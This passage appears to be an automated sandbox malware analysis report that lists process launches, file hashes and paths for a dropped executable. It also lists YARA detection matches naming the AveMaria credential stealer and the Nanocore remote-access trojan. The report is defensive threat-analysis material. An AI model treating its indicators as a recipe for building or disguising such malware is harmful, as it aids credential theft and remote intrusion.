                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, Author: Joe Security

                                Analysis Process: notepad.exe PID: 2416 Parent PID: 2604

                                General

                                Start time:11:00:02
                                Start date:02/08/2021
                                Path:C:\Windows\System32\notepad.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT'
                                Imagebase:0xff1d0000
                                File size:193536 bytes
                                MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Analysis Process: cmd.exe PID: 912 Parent PID: 2820

                                General

                                Start time:11:00:04
                                Start date:02/08/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\cmd.exe
                                Imagebase:0x4ab20000
                                File size:302592 bytes
                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Analysis Process: iBCrDCK.i.exe PID: 2340 Parent PID: 2820

                                General

                                Start time:11:00:16
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\AppData\Roaming\iBCrDCK.i.exe'
                                Imagebase:0xf50000
                                File size:1378816 bytes
                                MD5 hash:8FA8F52DFC55D341300EFF8E4C44BA33
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 20%, ReversingLabs

                                Analysis Process: drvinst.exe PID: 1464 Parent PID: 584

                                General

                                Start time:11:00:22
                                Start date:02/08/2021
                                Path:C:\Windows\System32\drvinst.exe
                                Wow64 process (32bit):false
                                Commandline:DrvInst.exe '1' '200' 'UMB\UMB\1&841921d&0&TERMINPUT_BUS' '' '' '6e3bed883' '0000000000000000' '000000000000059C' '0000000000000600'
                                Imagebase:0xff860000
                                File size:102912 bytes
                                MD5 hash:2DBA1472BDF847EAE358A4B9FA9AB0C1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Analysis Process: rdpdr.sys PID: 4 Parent PID: -1

                                General

                                Start time:11:00:22
                                Start date:02/08/2021
                                Path:C:\Windows\System32\drivers\rdpdr.sys
                                Wow64 process (32bit):false
                                Commandline:
                                Imagebase:0xff380000
                                File size:165888 bytes
                                MD5 hash:1B6163C503398B23FF8B939C67747683
                                Has elevated privileges:
                                Has administrator privileges:
                                Programmed in:C, C++ or other language

                                Analysis Process: tdtcp.sys PID: 4 Parent PID: -1

                                General

                                Start time:11:00:23
                                Start date:02/08/2021
                                Path:C:\Windows\system32\drivers\tdtcp.sys
                                Wow64 process (32bit):
                                Commandline:
                                Imagebase:
                                File size:23552 bytes
                                MD5 hash:51C5ECEB1CDEE2468A1748BE550CFBC8
                                Has elevated privileges:
                                Has administrator privileges:
                                Programmed in:C, C++ or other language

                                Analysis Process: tssecsrv.sys PID: 4 Parent PID: -1

                                General

                                Start time:11:00:24
                                Start date:02/08/2021
                                Path:C:\Windows\System32\DRIVERS\tssecsrv.sys
                                Wow64 process (32bit):
                                Commandline:
                                Imagebase:
                                File size:39936 bytes
                                MD5 hash:19BEDA57F3E0A06B8D5EB6D619BD5624
                                Has elevated privileges:
                                Has administrator privileges:
                                Programmed in:C, C++ or other language

                                Analysis Process: RDPWD.SYS PID: 4 Parent PID: -1

                                General

                                Start time:11:00:24
                                Start date:02/08/2021
                                Path:C:\Windows\System32\Drivers\RDPWD.SYS
                                Wow64 process (32bit):
                                Commandline:
                                Imagebase:
                                File size:212480 bytes
                                MD5 hash:FE571E088C2D83619D2D48D4E961BF41
                                Has elevated privileges:
                                Has administrator privileges:
                                Programmed in:C, C++ or other language

                                Analysis Process: iBCrDCK.i.exe PID: 2260 Parent PID: 2340

                                General

                                Start time:11:00:37
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Imagebase:0xf50000
                                File size:1378816 bytes
                                MD5 hash:8FA8F52DFC55D341300EFF8E4C44BA33
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Analysis Process: iBCrDCK.i.exe PID: 2428 Parent PID: 2340

                                General

                                Start time:11:00:37
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Imagebase:0xf50000
                                File size:1378816 bytes
                                MD5 hash:8FA8F52DFC55D341300EFF8E4C44BA33
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2355684386.0000000002502000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2355475529.00000000024B1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2360227304.0000000003777000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, Author: Joe Security

                                Disassembly

                                Code Analysis

                                Reset < >